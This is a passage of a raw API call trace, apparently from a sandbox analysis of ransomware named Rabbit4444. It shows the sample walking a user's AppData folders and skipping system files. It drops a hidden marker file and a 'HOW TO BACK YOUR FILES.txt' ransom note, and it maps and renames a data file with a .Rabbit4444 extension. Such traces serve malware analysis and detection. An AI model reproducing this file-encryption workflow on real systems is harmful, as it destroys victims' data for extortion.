UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.668] CloseHandle (hObject=0x29c) returned 1 [0070.668] CloseHandle (hObject=0x27c) returned 1 [0070.668] GetCurrentThreadId () returned 0xd98 [0070.668] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0070.668] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features" [0070.668] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117468 | out: hHeap=0xe0000) returned 1 [0070.668] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0070.668] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features" [0070.668] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\" [0070.668] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\.BFC0E91B00AE8A0620D3" [0070.668] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\features\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.670] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.672] FlushFileBuffers (hFile=0x27c) returned 1 [0070.672] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.673] CloseHandle (hObject=0x27c) returned 1 [0070.673] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features") returned 113 [0070.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.673] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf06a22a2, ftCreationTime.dwHighDateTime=0x1d327e6, ftLastAccessTime.dwLowDateTime=0xf073ad70, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf372c256, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0070.673] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.673] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.673] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.673] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.673] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf06a22a2, ftCreationTime.dwHighDateTime=0x1d327e6, ftLastAccessTime.dwLowDateTime=0xf073ad70, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf372c256, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.673] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.673] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.673] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.673] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.673] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.674] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf372c256, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf372c256, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf372c256, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.674] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.674] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.674] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf073ad70, ftCreationTime.dwHighDateTime=0x1d327e6, ftLastAccessTime.dwLowDateTime=0xf073ad70, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf07870ca, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x286, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="du.bin", cAlternateFileName="")) returned 1 [0070.674] lstrcmpiW (lpString1="du.bin", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.674] lstrcmpiW (lpString1="du.bin", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.674] lstrcmpiW (lpString1="du.bin", lpString2="Rabbit4444.exe") returned -1 [0070.674] lstrcmpiW (lpString1="du.bin", lpString2=".") returned 1 [0070.674] lstrcmpiW (lpString1="du.bin", lpString2="..") returned 1 [0070.674] lstrcmpiW (lpString1="du.bin", lpString2="windows") returned -1 [0070.674] lstrcmpiW (lpString1="du.bin", lpString2="bootmgr") returned 1 [0070.674] lstrcmpiW (lpString1="du.bin", lpString2="pagefile.sys") returned -1 [0070.674] lstrcmpiW (lpString1="du.bin", lpString2="boot") returned 1 [0070.674] lstrcmpiW (lpString1="du.bin", lpString2="ids.txt") returned -1 [0070.674] lstrcmpiW (lpString1="du.bin", lpString2="NTUSER.DAT") returned -1 [0070.674] lstrcpyW (in: lpString1=0x130ec1c, lpString2="du.bin" | out: lpString1="du.bin") returned="du.bin" [0070.674] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\du.bin", dwFileAttributes=0x0) returned 1 [0070.674] lstrlenW (lpString="du.bin") returned 6 [0070.674] lstrlenW (lpString="Rabbit4444") returned 10 [0070.674] lstrcmpiW (lpString1="\x03ꀀ", lpString2="Rabbit4444") returned 1 [0070.674] lstrlenW (lpString=".dll") returned 4 [0070.674] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0070.674] lstrlenW (lpString=".lnk") returned 4 [0070.674] lstrcmpiW (lpString1=".bin", lpString2=".lnk") returned -1 [0070.674] lstrlenW (lpString=".ini") returned 4 [0070.674] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0070.675] lstrlenW (lpString=".sys") returned 4 [0070.675] lstrcmpiW (lpString1=".bin", lpString2=".sys") returned -1 [0070.675] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\du.bin" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\features\\du.bin"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.675] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.675] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16198570995) returned 1 [0070.675] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=646) returned 1 [0070.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0070.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0070.675] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x590, lpName=0x0) returned 0x2d0 [0070.677] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x590) returned 0x70000 [0070.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115180 [0070.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0070.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0070.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0070.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0070.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0070.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0070.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0070.678] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16198893915) returned 1 [0070.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0070.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0070.678] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.678] CloseHandle (hObject=0x2d0) returned 1 [0070.678] CloseHandle (hObject=0x29c) returned 1 [0070.678] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\du.bin.Rabbit4444") returned 131 [0070.679] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\du.bin" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\features\\du.bin"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\du.bin.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\features\\du.bin.rabbit4444"), dwFlags=0x1) returned 1 [0070.679] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf073ad70, ftCreationTime.dwHighDateTime=0x1d327e6, ftLastAccessTime.dwLowDateTime=0xf073ad70, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf07870ca, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x286, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="du.bin", cAlternateFileName="")) returned 0 [0070.679] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0070.680] lstrcpyW (in: lpString1=0x130ec1c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.680] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Features\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\features\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.681] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.681] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.683] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.683] CloseHandle (hObject=0x29c) returned 1 [0070.683] CloseHandle (hObject=0x27c) returned 1 [0070.683] GetCurrentThreadId () returned 0xd98 [0070.683] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0070.683] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK" [0070.683] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b380 | out: hHeap=0xe0000) returned 1 [0070.683] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0070.683] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK" [0070.683] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\" [0070.683] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\.BFC0E91B00AE8A0620D3" [0070.683] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.685] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.687] FlushFileBuffers (hFile=0x27c) returned 1 [0070.688] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.688] CloseHandle (hObject=0x27c) returned 1 [0070.688] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK") returned 125 [0070.688] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.688] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcf78aa81, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf3751f70, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0070.689] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.689] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.689] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.689] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.689] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcf78aa81, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf3751f70, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.689] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.689] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.689] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.689] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.689] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.689] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3751f70, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3751f70, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3751f70, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.689] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.689] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.689] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdd597b03, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xdd597b03, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Creatives", cAlternateFileName="CREATI~1")) returned 1 [0070.689] lstrcmpiW (lpString1="Creatives", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.689] lstrcmpiW (lpString1="Creatives", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.689] lstrcmpiW (lpString1="Creatives", lpString2="Rabbit4444.exe") returned -1 [0070.689] lstrcmpiW (lpString1="Creatives", lpString2=".") returned 1 [0070.689] lstrcmpiW (lpString1="Creatives", lpString2="..") returned 1 [0070.689] lstrcmpiW (lpString1="Creatives", lpString2="windows") returned -1 [0070.689] lstrcmpiW (lpString1="Creatives", lpString2="bootmgr") returned 1 [0070.689] lstrcmpiW (lpString1="Creatives", lpString2="pagefile.sys") returned -1 [0070.689] lstrcmpiW (lpString1="Creatives", lpString2="boot") returned 1 [0070.689] lstrcmpiW (lpString1="Creatives", lpString2="ids.txt") returned -1 [0070.689] lstrcmpiW (lpString1="Creatives", lpString2="NTUSER.DAT") returned -1 [0070.689] lstrcpyW (in: lpString1=0x130ec34, lpString2="Creatives" | out: lpString1="Creatives") returned="Creatives" [0070.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0070.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x110) returned 0x1098e8 [0070.689] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x121fc8 [0070.689] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdd597b03, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xdd597b03, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Creatives", cAlternateFileName="CREATI~1")) returned 0 [0070.689] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0070.690] lstrcpyW (in: lpString1=0x130ec34, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.690] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.691] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.692] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.692] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.692] CloseHandle (hObject=0x29c) returned 1 [0070.692] CloseHandle (hObject=0x27c) returned 1 [0070.692] GetCurrentThreadId () returned 0xd98 [0070.692] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0070.692] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives" [0070.692] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0070.692] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0070.692] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives" [0070.692] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives", lpString2="\\" | out: 